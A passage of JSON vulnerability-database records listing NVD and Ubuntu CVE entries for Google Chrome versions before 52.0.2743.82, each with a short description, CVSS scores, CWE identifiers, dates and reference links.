"WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"<META name='referrer' content='no-referrer'>\" element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5135", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1711", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:24", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5127", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2017-09-01T01:29:00", "cpe": 
["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5127", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:06", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1705", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:26", "description": "The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp 
in the Content Security Policy (CSP) implementation in Blink, as used in Google Chrome before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5137", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google Chrome before 52.0.2743.82 does not ensure that 
URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5134", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5134", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-06-04T14:16:14", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc\nin the Extensions subsystem in Google Chrome before 52.0.2743.82 allows\nremote attackers to cause a denial of service or possibly have unspecified\nother impact via vectors related to script deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5136", "href": "https://ubuntu.com/security/CVE-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:15", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before\n52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with\nthe about:blank URL, which allows remote attackers to spoof the URL display\nvia a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1707", "bulletinFamily": "info", "cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1707", "href": "https://ubuntu.com/security/CVE-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:18", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not\nproperly implement the Secure Contexts specification during decisions about\nwhether to control a subframe, which allows remote attackers to bypass the\nSame Origin Policy via an https IFRAME element inside an http IFRAME\nelement.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5132", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5132", "href": "https://ubuntu.com/security/CVE-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not\nvalidate the origin of IPC messages to the plugin broker process that\nshould have come from the browser process, which allows remote attackers to\nbypass a sandbox protection mechanism via an unexpected message type,\nrelated to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc,\nppapi_thread.cc, and render_frame_message_filter.cc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1706", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1706", "href": "https://ubuntu.com/security/CVE-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-04T14:16:16", "description": 
"objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before\n52.0.2743.82, does not prevent API interceptors from modifying a store\ntarget without setting a property, which allows remote attackers to bypass\nthe Same Origin Policy via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5128", "href": "https://ubuntu.com/security/CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during\nproxy authentication, which allows man-in-the-middle attackers to spoof a\nproxy-authentication login prompt or trigger incorrect credential storage\nby modifying the client-server data stream.", "cvss3": {"exploitabilityScore": 
1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5133", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5133", "href": "https://ubuntu.com/security/CVE-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:14", "description": "The Chrome Web Store inline-installation implementation in the Extensions\nsubsystem in Google Chrome before 52.0.2743.82 does not properly consider\nobject lifetimes during progress observation, which allows remote attackers\nto cause a denial of service (use-after-free) or possibly have unspecified\nother impact via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, 
"published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1708", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1708", "href": "https://ubuntu.com/security/CVE-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:14", "description": "Heap-based buffer overflow in the ByteArray::Get method in\ndata/byte_array.cc in Google sfntly before 2016-06-10, as used in Google\nChrome before 52.0.2743.82, allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via a crafted SFNT font.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1709", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1709", "href": "https://ubuntu.com/security/CVE-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82,\ndoes not properly process left-trimmed objects, which allows remote\nattackers to cause a denial of service (memory corruption) or possibly have\nunspecified other impact via crafted JavaScript code.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5129", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5129", "href": "https://ubuntu.com/security/CVE-2016-5129", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "The ChromeClientImpl::createWindow method in\nWebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome\nbefore 52.0.2743.82, does not prevent window creation by a deferred frame,\nwhich allows remote attackers to bypass the Same Origin Policy via a\ncrafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1710", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1710", "href": "https://ubuntu.com/security/CVE-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82\ndoes not properly restrict multiple uses of a JavaScript forward method,\nwhich allows remote attackers to spoof the URL display via a crafted web\nsite.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5130", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5130", "href": "https://ubuntu.com/security/CVE-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:15", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google\nChrome before 52.0.2743.82, allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via vectors related to\nthe XPointer range-to function.\n\n#### Bugs\n\n * <https://bugzilla.gnome.org/show_bug.cgi?id=768428 (private as of 2016-09-27)>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=840554>\n", 